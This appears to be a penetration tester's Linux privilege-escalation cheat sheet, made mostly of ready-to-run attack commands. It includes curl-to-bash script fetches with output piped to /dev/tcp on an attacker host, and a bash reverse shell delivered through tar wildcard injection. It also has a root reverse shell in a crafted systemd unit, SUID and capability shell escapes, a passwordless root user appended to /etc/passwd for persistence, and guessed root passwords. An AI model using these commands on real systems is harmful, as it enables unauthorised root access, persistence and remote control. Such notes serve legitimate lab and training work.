Powered by

# Linux Privesc

# utilities

# Linux Exploit Suggester

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

# linpeas

running linpeas in memory:

on local box:

python3 -m http.server 80
nc -lvnp 443 > linpeas.log

Then on the target:

curl http://10.10.10.10:80/linpeas.sh | bash > /dev/tcp/10.10.10.10/443 2>/dev/null &

# linEnum

running LinEnum in memory:

on local box:

python3 -m http.server 80
nc -lvnp 443 > LinEnum.log

Then on the target:

curl http://10.10.10.10:80/LinEnum.sh | bash > /dev/tcp/10.10.10.10/443

# Special Permissions

setuid (SUID) bit- When set, files will get executed with the privileges of the file owner. setgid (SGID) bit - When set on a file, the file will get executed with the privileges of the file group. When set on a directory, files created within that directory will inherit the group of the directory itself.

# SUID

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner.

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

# Finding SUID files 

find / -type f -user root -perm -4000 2>/dev/null
also
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

# Once found

GTFObins has a bunch of good examples.

note: sometimes you have to setuid to 0 to get it to work

/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "/bin/bash")'

# Using SUID for privesc

If you find root RCE exploit you can use it to elevate privileges in an lower privileged shell:

./exploit.py "chmod +s /bin/bash"

and then in your other shell:

/bin/bash -p         # The -p flag tells bash preserves SUID privledges, otherwise you don't elevate.

# Capabilities

Linux capabilities are similar in principle to SUID but maintained by the kernel.

Finding files with special capabilities:

getcap -r / 2>/dev/null

Enable capabilities for files:

setcap cap_setuid+ep /home/demo/python3

# injecting commands with globs (*)

consider a cronjob which executes the following tar cf /home/user/backups/backup.tgz *

looking at LOLbins:

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

You can exploit the glob function and inject commands to escalate privileges:

$ printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.10.10/443 0>&1' > /var/www/html/shell
$ chmod +x /var/www/html/shell
$ touch /var/www/html/--checkpoint=1
$ touch /var/www/html/--checkpoint-action=exec=bash\ shell

# Exploiting capabilities 

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

# systemd reverse shell

If you can write to a system.d service file then use the following to give you a revshell as root

[Unit]
UNIT=LegitService
Description=Black magic happening, avert your eyes
After=network-online.target
Requires=network-online.target

[Service]
RemainAfterExit=yes
Type=simple
User=root
ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.10.10.10/443; cat <&5 | while read line; do $line 2>&5 >&5; done"

[Install]
WantedBy=default.target

# making rootbash

add the following to a writable file that is run as root

cp /bin/bash /tmp/rootbash && /bin/chmod +s /tmp/rootbash

now you can get elevated shell

/tmp/rootbash -p;

# Stupid settings

try "su root" with common passwords root,toor,god, creds you found in config.php, etc.

# writable /etc/passwd

Easy you can add a user to the end of the passwd file and su.

echo 'user::0:0::/root:/bin/bash' >>/etc/passwd
su - user

alternatively for persistence you can create a user entry with a password

openssl passwd -1 -salt gnnr gnnr               # short
mkpasswd -m SHA-512 gnnr                        # long

and then append it

echo 'gnnr:GENERATED_PASSWORD_HERE:0:0:gnnr:/root:/bin/bash' >> /etc/passwd

# kernel exploits

searchploit for kernel number or distro version

searchsploit centos 4.8
searchsploit linux kernel 2.6

NOTE: Searchsploit may not have what you need. google is your friend, also https://github.com/SecWiki/linux-kernel-exploits/

cross compiling exploits for 32 bit systems:

sudo apt install gcc-multilib                                # install gcc multilib if missing
gcc -m32 -Wl,--hash-style=both XXXX.c -o exploit             # dynamically link (try this first)
gcc --static -m32 -Wl,--hash-style=both XXXX.c -o exploit    # staically link

© Copyright 2021. All rights reserved.